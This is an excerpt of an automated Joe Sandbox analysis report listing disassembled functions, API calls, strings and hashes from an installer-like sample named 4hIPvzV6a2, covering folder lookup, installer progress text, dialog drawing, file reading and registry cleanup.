Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD

Function 00406594 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 204stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(Del,00000400), ref: 004066B6
GetWindowsDirectoryW.KERNEL32(Del,00000400,00000000,0042BA48,?,?,00000000,00000000,00423E20,74DF23A0), ref: 004066CC
SHGetPathFromIDListW.SHELL32(00000000,Del), ref: 0040672A
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
lstrcatW.KERNEL32(Del,\Microsoft\Internet Explorer\Quick Launch,00000000,0042BA48,?,?,00000000,00000000,00423E20,74DF23A0), ref: 0040675E
lstrlenW.KERNEL32(Del,00000000,0042BA48,?,?,00000000,00000000,00423E20,74DF23A0), ref: 004067B8

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
Del, xrefs: 004065C1, 0040667B, 00406682, 00406686, 0040669F, 004066A0, 004066B5, 004066CB, 004066FC, 00406728, 0040675D, 00406763, 00406780, 00406793, 004067B1, 004067B7, 004067C0, 004067F5
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Del$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-2121604768
Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040455A
GetSysColor.USER32(00000000), ref: 00404598
SetTextColor.GDI32(?,00000000), ref: 004045A4
SetBkMode.GDI32(?,?), ref: 004045B0
GetSysColor.USER32(?), ref: 004045C3
SetBkColor.GDI32(?,?), ref: 004045D3
DeleteObject.GDI32(?), ref: 004045ED
CreateBrushIndirect.GDI32(?), ref: 004045F7

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58

Function 004055DC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,00423E20,74DF23A0), ref: 00405637
SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

Function 00406805 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
CharNextW.USER32(?,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

Strings

*?|<>/":, xrefs: 00406857
C:\Users\user\AppData\Local\Temp\, xrefs: 00406806

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4010320282
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD

Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
GetMessagePos.USER32 ref: 00404EB4
ScreenToClient.USER32(?,?), ref: 00404ECE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06

Strings

f, xrefs: 00404EE2

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(000D80BC,00000064,000D80C0), ref: 00402FE1
wsprintfW.USER32 ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
wsprintfW.USER32 ref: 00404E2D
SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

%u.%u%s%s, xrefs: 00404E0E

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8

Function 00405ED1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
CharNextW.USER32(00000000), ref: 00405EE4
CharNextW.USER32(00000000), ref: 00405EFC

Strings

C:\, xrefs: 00405ED2

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
